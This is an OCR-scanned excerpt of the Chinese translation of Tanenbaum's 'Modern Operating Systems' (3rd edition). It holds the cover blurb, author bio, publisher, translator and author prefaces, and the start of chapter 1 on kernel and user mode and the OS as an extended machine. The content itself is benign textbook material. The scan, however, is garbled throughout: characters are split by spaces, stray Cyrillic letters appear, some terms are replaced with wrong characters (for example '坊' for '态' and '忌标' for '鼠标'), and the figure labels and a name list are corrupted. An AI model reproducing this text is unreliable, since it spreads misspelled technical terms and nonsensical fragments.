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Tanenbaum 教 授 作为 三 个 操作 3 | 长 期 设计 开发 操作 系统 的 经 验 ， 
从 而 把 其 对 理论 的 深入 理解 和 具体 中 统领 域 的 经 典 之 作 。 

在 本 书 第 3 版 中 ， 作 者 深入 讨论 存储 管理 、 文 件 系统 .I/O、 死 
锁 、 接 口 设计 、 多 媒体 、 性 能 权衡 ， J 势 。 书 中 不 仅 涵盖 了 现代 操作 系 


统 的 原理 和 实践 ， 而 且 特 别 关 注 了 Linux 操 作 系统 、Windows Vistat. ARRERA. t 
操作 系统 以 及 多 媒体 操作 系统 


本 书 特色 
@ 涉及 Windows Vista 以 及 最 新 的 Linux/UNIX 操 作 系统 。 
ө 用 一 整 章 (第 12 章 ) 的 篇 幅 对 用 于 移动 设备 的 Symbian 操作 系统 进行 分 析 。 

涵盖 更 多 、 更 新 的 安全 方面 的 内 容 。 

е 重新 组 织 内 容 ， 尽 早 论述 关键 抽象 概念 。 

o 给 出 与 未 来 操作 系统 发 展 有 关 的 新 研究 成 果 . 

o 更 新 和 增加 了 编程 练习 。 

ө 在 线 操作 系统 练习 (http://www.prenhall.com/tanenbaumidetails.html) 采 用 主流 Windows 操 作 
系统 以 及 开源 工具 。 

° 包括 操作 系统 模拟 练习 。 


(Е) 拥有 美国 麻 省 理工 学 院 的 理学 学 十 
а Andrew S. Tanenbaum #йяййяят+н еўна 
8 | 博士 学 位 ， 目 前 是 荷兰 阿姆斯特丹 Vrije 大 学 的 计算 机 科学 系 教授 。 多 年 来 ， 他 在 编译 技术 
Я | 操作 系统 网络 及 局 域 分 布 式 系统 方面 进行 了 大 量 的 研究 工作 。 目 前 ， 他 专注 于 系统 和 安全 

| 方面 的 高 级 研究 。 他 已 经 发 表 了 近 150 篇 论文 ， 并 在 十 几 个 国家 做 了 有 关 操 作 系 统 的 学 术 报 
告 。Tanenbaum 是 ACM 会 员 . IEEE 资 深 会 员 、 荷 兰 皇 家 艺术 和 科学 学 院 院士 ， 并 由 于 “对 
计算 领域 ， 特 别 是 计算 机 组 织 、 网 络 和 操作 系统 方面 的 教育 所 做 的 贡献 ”而 获得 2007 年 度 

IEEE James Н. Mulligan, J 教育 奖 。 他 还 入 选 了 《世界 名 人 录 》 
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本 书 是 操作 系统 领域 的 经 典 之 作 ， 与 第 2 版 相 比 ， 增 加 了 关于 Linux、Windows Vista 和 
Symbian 操 作 系统 的 详细 介绍 。 书 中 集中 讨论 了 操作 系统 的 基本 原理 ， 包 括 进程 、 线 程 、 存 
储 管理 、 文 件 系统 、 输 入 /输出 、 死 锁 等 ， 同 时 还 包含 了 有 关 计算 机 安全 、 多 媒体 操作 系统 、 
掌上 计算 机 操作 系统 、 微 内 核 、 多 核 处 理 机 上 的 虚拟 机 以 及 操作 系统 设计 等 方面 的 内 容 。 此 
外 ， 还 在 第 2 版 的 基础 上 对 部 分 习题 进行 了 增删 ， 更 有 助 于 读者 学 习 和 对 知识 的 理解 及 掌握 。 

本 书 适合 作为 高 等 院 校 计算 机 专业 操作 系统 课程 教材 ， 也 是 设计 、 开 发 操作 系统 的 重 
要 参考 书 。 
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出 版 者 的 话 


文艺 复兴 以 降 ， 源 远 流 长 的 科学 精神 和 逐步 形成 的 学 术 规范 ， 使 西方 国家 在 自然 科学 的 
各 个 领域 取得 了 垄断 性 的 优势 ， 也 正 是 这 样 的 传统 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 
家 辈出 、 独 领 风骚 。 在 商业 化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧密 地 结合 ， 计 算 机 
学 科 中 的 许多 泰山 北斗 同时 身 处 科研 和 教学 的 最 前 线 ， 由 此 而 产生 的 经 典 科学 著作 ， 不 仅 壁 
划 了 研究 的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵循 学 术 规范 ， 又 自 有 学 者 个 性 ， 其 价值 并 不 会 
因 年 月 的 流逝 而 减退 。 

近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ， 我 国 的 计算 机 产业 发 展 迅 猛 ， 对 专业 人 才 的 需求 日 
益 迫 切 。 这 对 计算 机 教育 界 和 出 版 界 都 既是 机 遇 ， 也 是 挑战 ， 而 专业 教材 的 建设 在 教育 战略 
上 显得 举足轻重 。 在 我 国信 息 技术 发 展 时 间 较 短 的 现状 下 ， 美 国 等 发 达 国家 在 其 计算 机 科学 
发 展 的 几 十 年 间 积淀 和 发 展 的 经 典 教材 仍 有 许多 值得 借鉴 之 处 。 因 此 ， 引 进 一 批 国外 优秀 计 
算 机 教材 将 对 我 国 计 算 机 教育 事业 的 发 展 起 到 积极 的 推动 作用 ， 也 是 与 世界 接轨 、 建 设 真正 
的 世界 一 流 大 学 的 必由之路 。 

机 械 工 业 出 版 社 华章 分 社 较 早 意识 到 “出 版 要 为 教育 服务 "。 自 1998 年 开始 ， 华 章 分社 就 
将 工作 重点 放 在 了 坟 选 、 移 译 国外 优秀 教材 上 。 经 过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson， 
McGraw-Hill, Elsevier, MIT, John Wiley & Sons，Cengage 等 世界 著名 出 版 公司 建立 了 良好 
的 合作 关系 ， 从 他 们 现 有 的 数 百 种 教材 中 甄选 出 Andrew S. Tanenbaum, Bjarne Stroustrup, 
Brain W. Kernighan, Dennis Ritchie, Jim Gray, Afred У. Aho, John Е. Hopcroft, Jeffrey D. 
Ullman, Abraham Silberschatz, William Stallings, Donald E. Knuth, John L. Hennessy, Larry 
L. Peterson 等 大 师 名 家 的 一 批 经 典 作品 ， 以 “计算 机 科学 丛书 ”为 总 称 出 版 ， 供 读者 学 习 、 研 
究 及 珍藏 。 大 理 石 纹理 的 封面 ， 也 正体 现 了 这 套 丛书 的 品位 和 格调 。 

“计算 机 科学 从 书 ”的 出 版 工作 得 到 了 国内 外 学 者 的 冉 力 襄 助 ， 国 内 的 专家 不 仅 提 供 了 中 
肯 的 选 题 指 导 ， 还 不 辞 劳苦 地 担任 了 翻译 和 审 校 的 工作 ， 而 原 书 的 作者 也 相当 关注 其 作品 在 
中 国 的 传播 ， 有 的 还 专程 为 其 书 的 中 译本 作 序 。 记 今 ,“ 计 算 机 科学 丛书 ”已 经 出 版 了 近 两 百 
个 品种 ， 这 些 书籍 在 读者 中 树立 了 良好 的 口碑 ， 并 被 许多 高 校 采 用 为 正式 教材 和 参考 书籍 。 
其 影印 版 “经 典 原版 书库 ”作为 姊妹 篇 也 被 越 来 越 多 实施 双语 教学 的 学 校 所 采用 。 

权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编辑 ， 这 些 因 素 使 我 们 的 
图 书 有 了 质量 的 保证 。 随 着 计算 机 科学 与 技术 专业 学 科 建设 的 不 断 完善 和 教材 改革 的 逐渐 深 
化 ， 教 育 界 对 国外 计算 机 教材 的 需求 和 应 用 都 将 步 入 一 个 新 的 阶段 ， 我 们 的 目标 是 尽善尽美 ， 
而 反馈 的 意见 正 是 我 们 达到 这 一 终极 目标 的 重要 帮助 。 华 章 分 社 欢迎 老师 和 读者 对 我 们 的 工 
作 提 出 建议 或 给 予 指正 ， 我 们 的 联系 方法 如 下 : 


华章 网 站 ，www.hzbook сот 


电子 邮件 ，hzjsj@hzbook сот 
联系 电话 ，(010) 88379604 
联系 地 址 北京 市 西城 区 百 万 庄 南 街 1 号 H2 Books 


邮政 编码 :100037 华章 教育 


| 译 者 序 


Andrew S. Tanenbaum 教 授 写作 的 《现代 操作 系统 》， 无 论 是 英文 版 还 是 中 文 版 都 受到 了 中 国 读者 的 
欢迎 。 究 其 原因 ， 该 书 内 容 丰 富 ， 反 映 了 当代 操作 系统 的 发 展 与 动向 。 这 次 出 版 的 第 3 版 ， 无 疑 在 保持 
原 有 特色 的 基础 上 ， 又 有 所 发 展 。 

第 3 版 的 一 个 很 大 变化 是 ， 大 大 加 强 了 对 操作 系统 中 许多 抽象 概念 的 叙述 ， 包 括 CPU 到 进程 的 抽 
象 、 物 理 内存 到 地 址 空间 (虚拟 内 存 ) 的 抽象 以 及 磁盘 到 文件 的 抽象 等 。Tanenbaum 教 授 在 《现代 操 
作 系 统 》 前 两 版 中 ， 在 这 一 方面 确实 着 墨 不 多 。 译 者 在 翻译 该 书 前 两 版 的 内 容 时 ， 就 对 此 有 些 疑 问 ， 
似乎 Tanenbaum 教 授 的 讲授 方法 与 众 不 同 。 这 是 因为 ， 在 国内 许多 院 校 的 操作 系统 教学 过 程 中 ， 授 课 
教师 非常 重视 对 这 些 抽象 概念 的 讲解 和 分 析 。 而 且 据 译 者 所 知 ， 在 美国 不 少 大 学 的 操作 系统 教学 过 程 
中 ， 也 很 重视 对 这 些 抽 象 概念 的 引入 。 译 者 认为 ，Tanenbaum 教 授 在 第 3 版 中 对 有 关 操作 系统 基本 抽象 
概念 叙述 方式 的 重大 修改 ， 是 对 《现代 操作 系统 》 内 在 质量 的 提升 ， 将 使 第 3 版 受到 更 多 中 国教 师 和 
读者 的 欢迎 。 

第 3 版 的 另外 一 个 重大 变化 是 ,第 10 章 、 第 11 章 和 第 12 章 是 由 另外 三 位 作者 贡献 的 ， 他 们 分 别 是 美 
国 佐治 亚 理工 学 院 的 Ada Gavrilovska 博 士 、Microsoft 公 司 的 Dave Probert 博 士 以 及 Hope 学 院 的 Mike 
Jipping 教 授 。 

第 10 章 的 贡献 者 Ada Gavrilovska 博 士 在 美国 佐治 亚 理工 学 院 的 计算 学 院 从 事 教学 和 科研 工作 ， 她 具 
有 多 年 讲授 高 级 操作 系统 等 有 关 课 程 的 经 验 ， 是 一 位 造 谢 很 高 的 研究 科学 家 。 

第 11 章 的 贡献 者 一 一 Microsoft 公 司 的 Dave Probert 博 士 是 译 者 的 老 朋 友 了 。 我 们 在 编写 机 械 工业 出 
版 社 出 版 的 《Windows 操 作 系统 原理 》 以 及 《Windows 内 核实 验 教程 》 等 书籍 的 过 程 中 ， 有 过 密切 的 合 
fE. Dave Probert 博 士 是 Microsoft 公 司 Windows 操 作 系统 内 核 的 主要 设计 人 员 之 一 ， 他 对 操作 系统 的 把 
提 以 及 以 设计 师 身份 对 Windows 操 作 系统 内 核 深入 和 广泛 的 认识 ， 几 乎 无 人 可 以 比拟 。Dave Probert 博 
士 写 作 了 第 11 章 ， 并 指出 哪些 地 方 Microsoft 做 对 了 ， 哪 些 地 方 Microsoft 做 错 了 。 正 如 Tanenbaum 教 授 在 
前 言 中 指出 的 :“ 由 于 Dave 的 工作 ， 本 书 的 质量 有 了 很 大 提高 ”。 

Mike Jipping 教 授 是 Hope 学 院 计算 机 系 的 主任 ， 具 有 长 期 的 教学 与 科研 经 验 。 他 早 在 2002 年 就 出 版 
了 专著 《Symbian OS Communications Programming》， 对 用 于 智能 手机 的 Symbian 操作 系统 有 着 深刻 的 
理解 ， 由 他 来 写作 有 关 Symbian OS 的 第 12 章 ， 当 然 是 再 合适 不 过 了 。 

本 书 还 增加 了 许多 新 的 习题 ， 有 助 于 读者 深入 理解 操作 系统 的 精髓 。 

本 书 的 出 版 得 到 了 机 械 工业 出 版 社 华章 分 社 的 大 力 支持 ， 在 此 表示 由 圳 感谢 。 

参加 本 书 翻 译 、 审 阅 和 校对 的 还 有 桂 尼克 、 古 亮 、 孔 俊 俊 、 孙 剑 、 畅 明 、 白 光 冬 、 刘 上 输 、 汉 涛 、 张 
Hik, ETX, ERI IK, Kiik, IKE, KRR, W, kek, EZ, EAR. eih, E 
起 博士 对 一 些 名 词 术语 的 翻译 提出 了 宝贵 意见 。 在 此 对 他 (她) 们 的 贡献 表示 诚挚 的 感谢 。 

由 于 译 者 水 平 有 限 ， 本 书 的 译文 必定 会 存在 一 些 不 足 或 错误 之 处 ， 欢 迎 各 位 专家 和 广大 读者 批评 指正 。 


# 者 
2009 年 5 月 


第 3 版 与 第 2 版 有 很 大 的 不 同 。 首 先 ， 重 新 安排 了 章节 ， 把 中 心材 料 安排 到 了 本 书 的 开始 部 分 。 对 于 
操作 系统 这 一 各 种 抽象 的 创建 者 ， 给 予 了 更 多 的 关注 。 对 第 1 章 进行 了 大 量 的 更 新 ， 引 入 了 所 有 的 概念 。 
第 2 章 涉及 从 CPU 到 多 进程 的 抽象 。 第 3 章 是 关于 物理 内 存 到 地 址 空间 (虚拟 内 存 ) 的 抽象 。 第 4 章 是 关 
于 磁盘 到 文件 的 抽象 。 进 程 、 虚 拟 地 址 空间 以 及 文件 是 操作 系统 所 呈现 的 关键 概念 ， 所 以 与 以 前 版 本 相 
比 将 这 些 章节 安排 在 更 为 靠 前 的 位 置 。 

第 1 章 在 很 多 地 方 都 进行 了 大 量 的 修改 和 更 新 。 例 如 ， 为 那些 只 熟悉 Java 语 言 的 读者 安排 了 对 C 程 序 
设计 语言 和 C 运 行 时 模式 的 介绍 。 

在 第 2 章 里 ， 更 新 和 扩充 了 有 关 线 程 的 讨论 ， 以 反映 它们 的 重要 性 。 另 外 ， 还 安排 了 一 节 关 于 IEEE 
标准 Pthread 的 讨论 。 

第 3 章 讨论 存储 管理 ， 已 经 重新 进行 了 组 织 ， 用 以 强调 操作 系统 的 这 一 项 关键 功能 ， 即 为 每 个 进程 
提供 虚拟 地 址 空间 的 抽象 。 有 关 批 处 理 系统 存储 管理 的 陈旧 材料 已 经 删 去 ， 对 有 关 分 页 实现 的 部 分 进行 
了 更 新 ， 以 便 能 够 满足 对 已 经 很 常见 的 大 地 址 空间 和 速度 方面 管理 的 需要 。 

对 第 4 章 到 第 7 章 进行 了 更 新 ， 删 去 了 陈旧 材料 ， 添 加 了 一 些 新 的 材料 。 这 些 章 中 有 关 当 前 研究 的 小 
节 是 全 部 重新 写作 的 。 此 外 ， 还 增加 了 许多 新 的 习题 和 程序 练习 。 

更 新 了 包括 多 核 系统 的 第 8 章 ， 增 加 了 关于 虚拟 技术 、 虚 拟 机 管理 程序 和 虚拟 机 一 节 ， 并 以 VMware 
为 例 。 

对 第 9 章 进行 了 很 大 的 修改 和 重新 组 织 ， 纳 入 关于 利用 代码 错误 、 恶 意 软件 和 对 抗 它们 的 大 量 新 
材料 。 

第 10 章 介绍 Linux， 这 是 原先 第 10 章 (UNIX 和 Linux) 的 修改 版 。 显 然 ， 本 章 重 点 是 Linux， 增 加 了 
大 量 的 新 材料 。 

涉及 Windows Vista 的 第 11 章 对 原 有 的 内 容 (关于 Windows 2000) 做 了 很 大 的 修改 ， 有 关 Windows 
的 内 容 用 最 新 的 材料 进行 了 更 新 。 

第 12 章 是 全 新 的 。 作 者 认为 ， 尽 管 嵌 入 式 操作 系统 远 比 用 于 PC 和 笔记 本 电脑 中 的 操作 系统 要 多 ， 
但 是 ， 对 于 用 于 手机 和 PDA 中 的 伐 和 式 操作 系统 ,在 很 多 教科 书 中 还 是 被 包 略 了 。 本 版 弥补 了 这 个 缺 性 ， 
对 普遍 用 于 智能 手机 的 Symbian OS 进行 了 广泛 的 讨论 。 

第 13 章 是 关于 操作 系统 设计 的 ， 第 2 版 的 内 容 多 数 都 保留 了 。 

本 书 为 教师 提供 了 大 量 的 教学 辅助 材料 ， 可 以 在 如 下 网 站 得 到 : www. prenhall. com/tanenbaum。 网 
站 中 包括 PPT、 学 习 操作 系统 的 软件 工具 、 学 生 实验 、 模 拟 程序 ， 以 及 许多 关于 操作 系统 课程 的 材料 。 
采用 本 书 的 教师 有 必要 访问 该 网 站 。 

这 一 版 得 到 了 许多 人 的 帮助 。 首 先 最 重要 的 是 编辑 Tracy Dunkelberger。Tracy 对 本 书 不 仅 尽责 而 且 超 
出 了 其 本 职 范围 ， 如 安排 大 量 的 评阅 ， 协 助 处 理 所 有 的 补充 材料 ， 处 理 合约 ， 与 出 版 社 接洽 ， 协 调 大 量 的 
并 发 事务 ， 设 法 使 工作 按时 完成 等 。 她 还 使 我 遵守 一 个 严格 的 时 间 表 ， 以 保证 本 书 按时 出 版 。 谢 谢 Tracy 。 

佐治 亚 理 工学 院 的 Ada Gavrilovska 是 Linux 内 核 技术 专家 ， 他 更 新 了 第 10 章 ， 从 UNIX (重点 在 
FreeBSD) 转向 了 Linux， 当 然 该 章 的 许多 内 容 对 所 有 的 UNIX 系 统 也 适用 。 在 学 生 中 Linux 比 FreeBSD 更 
普及 ， 所 以 这 是 一 个 有 意义 的 转变 。 

Microsoft 公 司 的 Dave Probert 更 新 了 第 11 章 ， 从 Windows 2000 转 向 了 Windows Vista， 尽 管 两 者 存在 
着 相似 之 处 ， 但 它们 之 间 还 是 有 很 大 差别 的 。Dave 对 Windows 技 术 有 深刻 的 认识 ， 并 足以 指出 哪些 地 方 
Microsoft 做 对 了 ， 哪 些 地 方 Microsoft 做 错 了 。 由 于 Dave 的 工作 ， 本 书 的 质量 有 了 很 大 提高 。 

Hope 学 院 的 Mike Jipping 写 作 了 有 关 Symbian OS 这 一 章 。 如 果 缺 乏 关于 做 入 式 实时 系统 的 内 容 ， 
则 会 使 本 书 存在 重大 缺 钙 ， 感 谢 Mike 使 本 书 免 除了 这 个 问题 。 在 现实 世界 中 ， 人 嵌入 式 实时 系统 变 得 越 来 
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越 重要 ， 本 章 对 这 方面 的 内 容 提 供 了 出 色 的 论述 。 

与 Ada、Dave 和 Mike 都 各 自 专注 一 章 不 同 ， 科 罗拉 多 大 学 Boulder 分 校 的 Shivakant Mishra 更 像 是 一 
个 分 布 式 系统 ， 他 阅读 和 评述 了 许多 章节 ， 并 为 本 书 提供 了 大 量 的 新 习题 和 编程 问题 。 

还 值得 提出 的 是 Hugh Lauer。 在 我 们 询问 他 有 关 修 改 第 2 版 的 建议 时 ， 不 曾 想得到 一 份 23 页 的 报告 。 
本 书 的 许多 修改 ， 包 括 对 进程 、 地 址 空间 和 文件 等 抽象 的 着 重 强调 ， 都 是 源 于 他 的 意见 。 

对 那些 以 各 种 方式 (从 新 论题 建议 到 封面 ， 细 心 阅读 文稿 ， 提 供 补充 材料 ， 贡献 新 习题 等 ) 给 予 支 
持 的 其 他 人 士 ， 作 者 也 不 胜 感激 。 这 些 人 十 是 Steve Armstrong, Jeffrey Chastine, John Connelly, 
Mischa Geldermans, Paul Gray, James Griffioen, Jorrit Herder, Michael Howard. Suraj Kothari, 
Roger Kraft, Trudy Levine, John MasiyowsKi, Shivakant Mishra, Rudy Pait, Xiao Qin, Mark 
Russinovich, Krishna Sivalingam, Leendert van Doom 和 Ken Wong, 

Prentice Hall 的 员工 总 是 友好 和 乐于 助人 的 ， 特 别 是 负责 生产 的 Irwin Zucker 和 Scott Disanno， 以 及 
负责 编辑 的 David Alick、ReeAnne Davies 和 Melinda Haggerty, 

Barbara 和 Marvin 像 往常 一 样 ， 保 持 着 各 自 独特 的 美妙 方式 。 当 然 ， 还 要 感谢 付出 了 爱 和 而 心 的 
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现代 计算 机 系统 由 一 个 或 多 个 处 理 器 、 主 存 、 磁 盘 、 打 印 机 、 键 盘 、 忌 标 、 显 示 器 、 网 络 接口 以 及 
各 种 其 他 输入 /输出 设备 组 成 。 一 般 而 言 ， 现 代 计算 机 系统 是 一 个 复杂 的 系统 。 如 果 每 位 应 用 程序 员 都 
不 得 不 掌握 系统 所 有 的 细节 ， 那 就 不 可 能 再 编写 代码 了 。 而 且 ， 管 理 所 有 这 些 部 件 并 加 以 优化 使 用 ， 是 
一 件 挑战 性 极 强 的 工作 。 所 以 ， 计 算 机 安装 了 一 层 软件 ， 称 为 操作 系统 ， 它 的 任务 是 为 用 户 程序 提供 一 
个 更 好 、 更 简单 、 更 清晰 的 计算 机 模型 ， 并 管理 刚才 提 到 的 所 有 这 些 设备 。 本 书 的 主题 就 是 操作 系统 。 

多 数 读者 都 会 对 诸如 Windows、Linux、FreeBSD 或 Mac OS X 等 某 个 操作 系统 有 些 体验 ， 但 表面 现 
象 是 会 骗 人 的 。 用 户 与 之 交互 的 程序 ， 基 于 文本 的 通常 称 为 shell， 而 基于 图 标的 则 称 为 图 形 用 户 界面 
(Graphical User Interface，GUI) ， 它 们 实际 上 并 不 是 操作 系统 的 一 部 分 ， 尽管 这 些 程序 使 用 操作 系统 来 
完成 工作 。 

图 1-1 给 出 了 在 这 里 所 讨论 主要 部 件 的 一 个 简化 视图 。 图 的 底部 是 硬件 。 硬 件 包括 芯片 、 电 路 板 
磁盘 、 键 盘 、 显 示 器 以 及 类 似 的 设备 。 在 硬件 的 顶部 是 软件 。 多 数 计算 机 有 两 种 运行 模式 ， 内 核 态 和 用 
户 态 。 软 件 中 最 基础 的 部 分 是 操作 系统 ， 它 运行 在 内 核 坊 (也 称 为 管 坊 、 核 心态 )。 在 这 个 模式 中 ， 操 
作 系 统 具 有 对 所 有 硬件 的 完全 访问 权 ， 可 以 执行 机 器 能 够 运行 的 任何 指令 。 软 件 的 其 余部 分 运行 在 用 户 
态 下 。 在 用 户 态 下 ， 只 使 用 了 机 器 指令 中 的 一 个 子 集 。 特 别 地 ， 那 些 会 影响 机 器 的 控制 或 可 进行 IO 
(输入 /输出 ) 操作 的 指令 ， 在 用 户 态 中 的 程序 里 是 禁止 的 。 在 本 书 中 ， 我 们 会 不 断 地 讨论 内 核 态 和 用 户 


坊 之 间 的 差别 。 
用 户 接口 程序 ，shell 或 者 GUI， 处 于 用 户 态 电子 邮件 аж 

程序 中 的 最 低层 次 ， 允 许 用 户 运行 其 他 程序 ， 诸 wonga 阅读 器 。 播放 器 

如 Web 浏 览 器 、 电 子 邮件 阅读 器 或 音乐 播放 器 等 。 六 

这 些 程序 也 大 量 使 用 操作 系统 。 [ оо Ө E 
操作 系统 所 在 的 位 置 如 图 1-1 所 示 。 它 运行 在 用户 太 ] артат ав 

裸 机 之 上 ， 为 所 有 其 他 软件 提供 基础 的 运行 环境 。 l А | | 
操作 系统 和 普通 软件 (用 户 态 ) 之 间 的 主要 yg | 操作 系统 | | 

区 别 是 ， 如 果 用 户 不 喜欢 某 个 特定 的 电子 邮件 阅 2 

读 器 ， 他 可 以 自由 选择 另 一 个 ， 或 者 选择 自己 写 [БЕ дыы Е 

一 个 ， 但 是 他 不 能 自行 写 一 个 属于 操作 系统 一 部 - 

分 的 时 钟 中 断 处 理 程序 。 这 个 程序 由 硬件 保护 ， 图 1-1 操作 系统 所 处 的 位 置 


防止 用 户 试图 对 其 进行 修改 。 

然而 ， 有 时 在 嵌入 式 系统 该 系统 没有 内 核 态 ) 或 解释 系统 (如 基于 Java 的 操作 系统 ， 它 采用 解释 
方式 而 非 硬件 方式 区 分 组 件 ) 中 ， 上 述 区 别 是 模糊 的 。 

另外 ， 在 许多 系统 中 ， 一 些 在 用 户 态 下 运行 的 程序 协助 操作 系统 完成 特权 功能 。 例 如 ， 经 常 有 一 个 
程序 供用 户 修改 其 口令 之 用 。 但 是 这 个 程序 不 是 操作 系统 的 一 部 分 ， 也 不 在 内 核 态 下 运行 ， 不 过 它 明 显 
地 带 有 敏感 的 功能 ， 并 且 必 须 以 某 种 方式 给 予 保护 。 在 某 些 系统 中 ， 这 种 想法 被 推 向 了 极致 一些 传统 
上 被 认为 是 操作 系统 的 部 分 (诸如 文件 系统 ) 在 用 户 空间 中 运行 。 在 这 类 系统 中 ， 很 难 划分 出 一 条 明显 
的 界限 。 在 内 核 态 中 运行 的 当然 是 操作 系统 的 一 部 分 ， 但 是 一 些 在 内 核 外 运行 的 程序 也 有 争议 地 被 认为 
是 操作 系统 的 一 部 分 ， 或 者 至 少 与 操作 系统 密切 相关 。 

操作 系统 与 用 户 〈 即 应 用 ) 程序 的 差异 并 不 在 于 它们 所 处 的 地 位 。 特 别 地 ， 操 作 系统 是 大 型 、 复 杂 
和 长 考 命 的 程序 。Linux 或 Windows 操 作 系统 的 源 代码 有 5 百 万 行 数量 级 。 要 理解 这 个 数量 的 含义 ， 请 攻 
虚 具 有 5 百 万 行 的 一 套 书 ， 每 页 50 行 ， 每 卷 1000 页 ( 比 本 书 厚 )。 为 了 以 书 的 大 小 列 出 一 个 操作 系统 ， 需 
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要 有 100 卷 书 一 一 基本 上 需要 一 整个 书架 来 摆 放 。 请 设想 一 下 有 个 维护 操作 系统 的 工作 ， 第 一 天 老板 带 
你 到 装 有 代码 的 书架 旁 ， 说 :“ 去 读 吧 。” 而 这 仅仅 是 运行 在 内 核 中 的 部 分 代码 。 用 户 程序 ， 如 GUI、 库 
以 及 基本 应 用 软件 (类似 于 Windows Explorer) 等 ， 很 容易 就 能 达到 这 个 代码 数量 的 10 倍 或 20 倍 之 多 。 

至 于 为 什么 操作 系统 的 寿命 较 长 ,读者 现在 应 该 清楚 了 一 一 操作 系统 是 很 难 编 一 旦 编写 完成 ， 
操作 系统 的 所 有 者 当然 不 愿意 把 它 扔 掉 ， 再 写 一 个 。 相 反 ， 操 作 系统 会 在 长 时 间 内 进行 演化 。 基 本 上 可 
以 把 Windows 95/98/Me 看 成 是 一 个 操作 系统 ， 而 Windows NT/2000/XP/Vista 则 是 另外 一 个 操作 系统 。 对 
于 用 户 而 言 ， 它 们 看 上 去 很 相像 ， 因 为 微软 公司 努力 使 Windows 2000/XP 与 被 替代 的 系统 ， 如 Windows 
98， 两 者 的 用 户 界面 看 起 来 十 分 相似 。 无 论 如 何 ， 微 软 公司 要 舍弃 Windows 98 是 有 非常 正当 的 原因 的 ， 
我 们 将 在 第 11 章 涉及 Windows 细 节 时 具体 讨论 这 一 内 容 。 

贯穿 本 书 的 其 他 主要 例子 (除了 Windows) 还 有 UNIX， 以 及 它 的 变 体 和 克隆 版 。UNIX， 当 然 也 演 
化 了 多 年 ， 如 System V 版 、Solaris 以 及 FreeBSD 等 都 是 来 源 于 UNIX 的 原始 版 ， 不 过 尽管 Linux 非 常 像 依 
照 UNIX 模 式 而 仿制 ， 并 且 与 UNIX 高 度 兼 容 ， 但 是 Linux 具 有 全 新 的 代码 基础 。 本 书 将 采用 来 自 ONIX 中 
的 示例 ， 并 在 第 10 章 中 具体 讨论 Linux。 

本 章 将 简要 叙述 操作 系统 的 若干 重要 部 分 ， 内 容 包括 其 含义 、 历 史 、 分 类 、 一 些 基本 概念 及 其 结构 。 
在 后 面 的 章节 中 ， 我 们 将 具体 地 讨论 这 些 重要 内 容 。 


1.1 什么 是 操作 系统 

很 难 给 出 操作 系统 的 准确 定义 。 操 作 系统 是 一 种 运行 在 内 核 态 的 软件 一 一 尽管 这 个 说 法 并 不 总 是 符 
合 事实 。 部 分 原因 是 操作 系统 执行 两 个 基本 上 独立 的 任务 ， 为 应 用 程序 员 (实际 上 是 应 用 程序 ) 提供 一 
个 资源 集 的 清晰 抽象 ， 并 管理 这 些 硬件 资源 ， 而 不 仅仅 是 一 堆 硬件 。 另 外 ， 还 取决 于 从 什么 角度 看 待 操 
作 系统 。 读 者 多 半 听 说 过 其 中 一 个 或 另 一 个 的 功能 。 下 面 我 们 逐 项 进行 讨论 。 


1.1.1 作为 扩展 机 器 的 操作 系统 

在 机 器 语言 一 级 上 , 多 数 计算 机 的 体系 结构 (指令 集 、 存 储 组 织 、I/O 和 总 线 结构 ) 是 很 原始 的 ， 
而 且 编程 是 很 困难 的 ， 尤 其 是 对 输入 /输出 操作 而 言 。 要 更 细致 地 考察 这 一 点 ， 可 以 考虑 如 何 用 NEC 
PD765 控 制 器 芯片 来 进行 软盘 IO 操作 ， 多 数 基于 Intel 的 个 人 计算 机 中 使 用 了 该 控制 器 兼容 芯片 。( 在 本 
忆 中 ， 术 语 “软盘 ”和 “磁盘 ”是 可 互 换 的 。) 我 们 之 所 以 使 用 软盘 作为 例子 ， 是 因为 它 虽然 已 经 很 少 
见 ， 但 是 与 现代 硬盘 相 比 则 简单 得 多 。PD765 有 16 条 命令 ， 每 一 条 命令 向 一 个 设备 寄存 器 装 入 长 度 从 1 
字 节 到 9 字 节 的 特定 数据 。 这 些 命令 用 于 读 写 数据 、 移 动 磁头 臂 、 格 式 化 磁道 ， 以 及 初始 化 、 检 测 状态 、 
复位 、 校 准 控制 器 及 设备 等 。 

最 基本 的 命令 是 read 和 write。 它 们 均 需要 13 个 参数 ， 所 有 这 些 参数 封装 在 9 个 字 节 中 。 这 些 参数 所 
指定 的 信息 有 : 欲 读 取 的 磁盘 块 地 址 、 磁 道 的 扇 区 数 、 物 理 介质 的 记录 格式 、 遍 区间 险 以 及 对 已 删除 数 
据 地 址 标识 的 处 理 方法 等 。 如 果 读 者 不 懂 这 些 “ 故 弄 云 虚 ” 的 语言 ， 请 不 要 担心 ， 因 为 这 正 是 关键 所 在 一 一 
它们 太 玄 秘 了 。 当 操作 结束 时 ， 控 制 器 芯片 在 7 个 字 节 中 返回 23 个 状态 及 出 错字 段 。 这 样 似乎 还 不 够 ， 
软盘 程序 员 还 要 注意 保持 步 进 电 机 的 开关 状态 。 如 果 电机 关闭 着 ， 则 在 读 写 数据 前 要 先 启动 它 (有 -- 段 
较 长 的 启动 延迟 时 间 )。 而 电机 又 不 能 长 时 间 处 于 开启 状态 ， 和 否则 软盘 片 就 会 被 磨 坏 。 程 序 员 必 须 在 较 
长 的 启动 延迟 和 可 能 对 软盘 造成 损坏 (和 丢失 数据 ) 之 间 做 出 权衡。 

现在 不 用 再 叙述 读 操作 的 具体 过 程 了 ， 很 清楚 ， 一 般 程序 员 并 不 想 涉足 软盘 (或 硬盘 ， 更 复杂 ) 编 
程 的 这 些 具 体 细节 。 相 反 ， 程 序 员 需 要 的 是 一 种 简单 的 、 高 度 抽象 的 处 理 。 在 磁盘 的 情况 下 ， 典 型 的 抽 
象 是 包含 了 一 组 已 命名 文件 的 一 个 磁盘 。 每 个 文件 可 以 打开 进行 读 写 操作 ， 然 后 进行 读 写 ， 最 后 关闭 文 
件 。 诸 如 记录 是 否 应 该 使 用 修正 的 调频 记录 方式 ， 以 及 当前 电机 的 状态 等 细节 ， 不 应 该 出 现在 提供 给 应 
用 程序 员 的 抽象 描述 中 。 

